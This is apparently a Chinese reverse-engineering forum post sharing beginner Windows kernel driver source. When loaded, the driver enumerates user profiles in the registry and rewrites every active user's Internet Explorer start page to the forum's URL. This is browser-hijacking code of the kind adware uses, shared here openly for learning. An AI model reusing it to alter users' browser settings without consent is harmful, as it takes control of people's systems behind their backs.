白菜写了个驱动探测注册表当前用户,改了一下主页。
高手飘过。有写的不对的地方请赐教!
新手大家一起讨论!(代码和sys都在附件中)
(源代码)
改主页:
#include "Driver.h"
#pragma INITCODE
VOID changeStartPage(UNICODE_STRING main)
{
HANDLE hRegister;
OBJECT_ATTRIBUTES objectAttributes;
InitializeObjectAttributes(&objectAttributes,
&main,
OBJ_CASE_INSENSITIVE,
NULL,
NULL);
NTSTATUS ntstatus = ZwOpenKey(&hRegister,
KEY_ALL_ACCESS,
&objectAttributes);
if(NT_SUCCESS(ntstatus))
{
KdPrint(("Open register successfully\n"));
}
UNICODE_STRING ValueName;
RtlInitUnicodeString(&ValueName,L"Start Page");
WCHAR* strValue=L"http://www.kanxue.com";
ZwSetValueKey(hRegister,
&ValueName,
0,
REG_SZ,
strValue,
wcslen(strValue)*2+2);
ZwClose(hRegister);
}
枚举当前用户
#pragma INITCODE
VOID EnumerateCurrentUser()
{
UNICODE_STRING RegCurrentUser,RegUser,main;
UNICODE_STRING RegProfileList,RegProf;
WCHAR CurrentUserbuf[256];
WCHAR ProfileListbuf[256];
RtlInitUnicodeString(&RegProf,L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\");
RtlInitUnicodeString(&RegUser,L"\\Registry\\User\\");
RtlInitUnicodeString(&main,L"\\Software\\Microsoft\\Internet Explorer\\Main\\");
RtlInitEmptyUnicodeString(&RegCurrentUser,CurrentUserbuf,256*sizeof(WCHAR));
RtlInitEmptyUnicodeString(&RegProfileList,ProfileListbuf,256*sizeof(WCHAR));
RtlCopyUnicodeString(&RegCurrentUser,&RegUser);
RtlCopyUnicodeString(&RegProfileList,&RegProf);
RTL_QUERY_REGISTRY_TABLE paramTable[2];
ULONG udefaultData=0;
ULONG uQueryValue;
RtlZeroMemory(paramTable,sizeof(paramTable));
paramTable[0].Flags=RTL_QUERY_REGISTRY_DIRECT;
paramTable[0].Name=L"RefCount";
paramTable[0].EntryContext=&uQueryValue;
paramTable[0].DefaultType=REG_DWORD;
paramTable[0].DefaultData=&udefaultData;
paramTable[0].DefaultLength=sizeof(ULONG);
HANDLE hRegister;
OBJECT_ATTRIBUTES objectAttributes;
InitializeObjectAttributes(&objectAttributes,
&RegProf,
OBJ_CASE_INSENSITIVE,
NULL,
NULL);
NTSTATUS ntStatus = ZwOpenKey(&hRegister,
KEY_ALL_ACCESS,
&objectAttributes);
if(NT_SUCCESS(ntStatus))
{
KdPrint(("Open register successfully\n"));
}
ULONG ulSize;
ZwQueryKey(hRegister,
KeyFullInformation,
NULL,
0,
&ulSize);
PKEY_FULL_INFORMATION pfi =
(PKEY_FULL_INFORMATION)
ExAllocatePool(PagedPool,ulSize);
ZwQueryKey(hRegister,
KeyFullInformation,
pfi,
ulSize,
&ulSize);
for(ULONG i=0;i<pfi->SubKeys;i++)
{
ZwEnumerateKey(hRegister,
i,
KeyBasicInformation,
NULL,
0,
&ulSize);
PKEY_BASIC_INFORMATION pbi =
(PKEY_BASIC_INFORMATION)
ExAllocatePool(PagedPool,ulSize);
ZwEnumerateKey(hRegister,
i,
KeyBasicInformation,
pbi,
ulSize,
&ulSize);
UNICODE_STRING uniKeyName;
uniKeyName.Length =
uniKeyName.MaximumLength =
(USHORT)pbi->NameLength;
uniKeyName.Buffer = pbi->Name;
if(uniKeyName.Length>20)
{
RtlAppendUnicodeStringToString(&RegCurrentUser,&uniKeyName);
RtlAppendUnicodeStringToString(&RegProfileList,&uniKeyName);
// KdPrint(("The %d sub item name:%wZ\n",i,&uniKeyName));
// KdPrint(("The %d sub item name:%wZ\n",i,&RegProfileList));
// KdPrint(("The %d sub item name:%wZ\n",i,&RegCurrentUser));
RtlQueryRegistryValues(RTL_REGISTRY_ABSOLUTE,RegProfileList.Buffer,paramTable,NULL,NULL);
if (uQueryValue>0)
{
KdPrint(("HKET_CURRENT_USER: %wZ\n",&RegCurrentUser));
RtlAppendUnicodeStringToString(&RegCurrentUser,&main);
KdPrint(("HKET_CURRENT_USER_main: %wZ\n",&RegCurrentUser));
changeStartPage(RegCurrentUser);
}
}
RtlCopyUnicodeString(&RegCurrentUser,&RegUser);
RtlCopyUnicodeString(&RegProfileList,&RegProf);
ExFreePool(pbi);
}
ExFreePool(pfi);
ZwClose(hRegister);
}
main
#pragma INITCODE
extern "C" NTSTATUS DriverEntry (
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING pRegistryPath )
{
NTSTATUS status;
KdPrint(("Enter DriverEntry\n"));
pDriverObject->DriverUnload = HelloDDKUnload;
pDriverObject->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_CLOSE] = HelloDDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_WRITE] = HelloDDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_READ] = HelloDDKDispatchRoutine;
status = CreateDevice(pDriverObject);
EnumerateCurrentUser();
KdPrint(("DriverEntry end\n"));
return status;
}
#pragma INITCODE
NTSTATUS CreateDevice (
IN PDRIVER_OBJECT pDriverObject)
{
NTSTATUS status;
PDEVICE_OBJECT pDevObj;
PDEVICE_EXTENSION pDevExt;
UNICODE_STRING devName;
RtlInitUnicodeString(&devName,L"\\Device\\MyDDKDevice");
status = IoCreateDevice( pDriverObject,
sizeof(DEVICE_EXTENSION),
&(UNICODE_STRING)devName,
FILE_DEVICE_UNKNOWN,
0, TRUE,
&pDevObj );
if (!NT_SUCCESS(status))
return status;
pDevObj->Flags |= DO_BUFFERED_IO;
pDevExt = (PDEVICE_EXTENSION)pDevObj->DeviceExtension;
pDevExt->pDevice = pDevObj;
pDevExt->ustrDeviceName = devName;
UNICODE_STRING symLinkName;
RtlInitUnicodeString(&symLinkName,L"\\??\\HelloDDK");
pDevExt->ustrSymLinkName = symLinkName;
status = IoCreateSymbolicLink( &symLinkName,&devName );
if (!NT_SUCCESS(status))
{
IoDeleteDevice( pDevObj );
return status;
}
return STATUS_SUCCESS;
}
#pragma PAGEDCODE
VOID HelloDDKUnload (IN PDRIVER_OBJECT pDriverObject)
{
PDEVICE_OBJECT pNextObj;
KdPrint(("Enter DriverUnload\n"));
pNextObj = pDriverObject->DeviceObject;
while (pNextObj != NULL)
{
PDEVICE_EXTENSION pDevExt = (PDEVICE_EXTENSION)
pNextObj->DeviceExtension;
UNICODE_STRING pLinkName = pDevExt->ustrSymLinkName;
IoDeleteSymbolicLink(&pLinkName);
pNextObj = pNextObj->NextDevice;
IoDeleteDevice( pDevExt->pDevice );
}
}
#pragma PAGEDCODE
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
IN PIRP pIrp)
{
KdPrint(("Enter HelloDDKDispatchRoutine\n"));
NTSTATUS status = STATUS_SUCCESS;
pIrp->IoStatus.Status = status;
pIrp->IoStatus.Information = 0;
IoCompleteRequest( pIrp, IO_NO_INCREMENT );
KdPrint(("Leave HelloDDKDispatchRoutine\n"));
return status;
}
inhell.rar
[课程]Android-CTF解题方法汇总!